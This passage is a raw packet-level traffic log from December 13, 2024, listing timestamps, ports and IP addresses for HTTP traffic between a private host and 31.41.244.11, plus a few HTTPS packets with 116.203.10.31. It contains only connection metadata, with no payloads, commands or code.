Dec 13, 2024 18:53:54.146733999 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.147166014 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.147181988 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.147226095 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.148075104 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.148128033 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.149183989 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.149239063 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.287632942 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.287700891 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.287781954 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.287820101 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.287856102 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.287872076 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.287909031 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.288731098 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.288791895 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.288880110 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.288954020 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.289623976 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.289674997 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.290463924 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.290518999 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.290684938 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.290707111 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.290731907 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.290743113 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.291637897 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.291691065 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.291928053 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.291979074 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.292634010 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.292679071 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.292737007 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.292779922 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.293656111 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.293706894 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.293884039 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.293987989 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.294889927 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.294928074 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.295193911 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.295248985 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.295943022 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.295990944 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.296725035 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.296740055 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.296776056 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.296787977 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.296799898 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.297060013 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.297669888 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.297878027 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.298340082 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.298424959 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.298737049 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.298753023 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.298798084 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.299695015 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.299736977 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.299882889 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.300314903 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.300735950 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.300750971 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.300786018 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.300796986 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.301827908 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.301892042 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.301978111 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.302037001 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.302732944 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.302793026 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.302830935 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.302876949 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.303757906 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.303807974 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.304127932 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.304173946 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.304790974 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.304841042 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.304878950 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.304922104 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.305790901 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.305876970 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.306689978 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.306749105 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.306852102 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.306866884 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.306895971 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.306906939 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.307841063 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.308875084 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.308890104 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.308926105 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.308950901 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.308969021 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.309844017 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.309880972 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.309891939 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.310436010 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.310885906 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.310931921 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.311961889 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.311980009 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.312012911 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.312038898 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.312083006 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.312937021 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.312952995 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.312980890 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.313004971 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.313898087 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.314074993 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.314121962 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.314917088 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.314961910 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.315092087 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.315135956 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.315979004 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.315994978 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.316024065 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.316056013 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.317058086 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.317074060 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.317121983 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.317965031 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.318010092 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.318535089 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.318613052 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.319087029 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.319108963 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.319154978 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.320014954 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.320063114 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.320468903 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.320961952 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.321010113 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.321388960 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.321436882 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.322024107 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.322077036 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.322130919 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.322191000 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.323076010 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.323127031 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.323771954 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.323826075 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.324500084 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.324517012 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.324547052 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.324564934 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.325047016 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.325109959 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.325387001 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.325443029 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.326123953 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.326380968 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.326394081 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.326438904 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.327151060 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.327167034 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.327203035 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.327214003 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.328094006 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.328145981 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.329125881 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.329143047 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.329180956 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.329204082 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.329267025 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.329895973 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.330102921 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.330146074 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.330384016 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.330425024 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.331161976 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.331216097 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.331944942 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.332022905 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.332132101 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.332869053 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.332916975 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.333209038 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.333225012 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.333256960 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.333283901 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.334183931 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.334363937 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.334419012 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.335432053 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.335479975 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.336281061 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.336298943 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.336327076 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.336339951 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.336652040 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.337241888 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.337290049 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.337538958 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.337584019 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.338233948 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.338392019 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.338442087 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.339262009 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.339315891 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.340075016 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.340133905 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.340276003 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.340291977 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.340321064 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.340332031 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.411299944 CET	443	49922	116.203.10.31	192.168.2.7
Dec 13, 2024 18:53:54.411427975 CET	443	49922	116.203.10.31	192.168.2.7
Dec 13, 2024 18:53:54.411513090 CET	49922	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:53:54.411555052 CET	443	49922	116.203.10.31	192.168.2.7
Dec 13, 2024 18:53:54.411602020 CET	443	49922	116.203.10.31	192.168.2.7
Dec 13, 2024 18:53:54.411653042 CET	49922	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:53:54.419538975 CET	49922	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:53:54.419564009 CET	443	49922	116.203.10.31	192.168.2.7
Dec 13, 2024 18:53:54.480103016 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.480123997 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.480191946 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.480629921 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.480648041 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.480679989 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.480707884 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.481420040 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.481909037 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.481914997 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.481956959 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.482351065 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.482397079 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.482769966 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.482815027 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.483203888 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.483247042 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.483679056 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.483695030 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.483727932 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.483740091 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.484720945 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.484736919 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.484776974 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.485749960 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.485791922 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.486748934 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.486764908 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.486803055 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.486814976 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.486912966 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.487773895 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.487814903 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.487956047 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.487997055 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.488698959 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.488713980 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.488743067 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.488754034 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.489881992 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.490458012 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.490513086 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.490889072 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.490933895 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.492058039 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.492073059 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.492091894 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.492105961 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.492119074 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.492136002 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.493129015 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.493144989 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.493170977 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.493181944 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.494134903 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.494151115 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.494184017 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.494194031 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.495323896 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.495502949 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.495541096 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.496189117 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.496205091 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.496231079 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.496253967 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.497308969 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.497498035 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.497540951 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.498384953 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.499360085 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.499406099 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.499593019 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.499608994 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.499633074 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.499658108 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.500478983 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.500494957 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.500540972 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.501415014 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.501472950 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.501883030 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.501920938 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.502628088 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.502643108 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.502669096 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.502681017 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.503293991 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.503309965 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.503339052 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.503350973 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.504092932 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.504108906 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.504152060 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.505130053 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.505146027 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.505184889 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.506174088 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.506928921 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.506944895 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.506973028 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.506987095 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.507386923 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.507428885 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.507980108 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.508023977 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.508239985 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.508960962 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.509005070 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.509198904 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.509238958 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.510174990 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.510195017 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.510236979 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.511115074 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.511162996 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.511993885 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.512008905 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.512037039 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.512048006 CET	49917	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:54.513004065 CET	80	49917	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:54.513020039 CET	80	49917	31.41.244.11	192.168.2.7
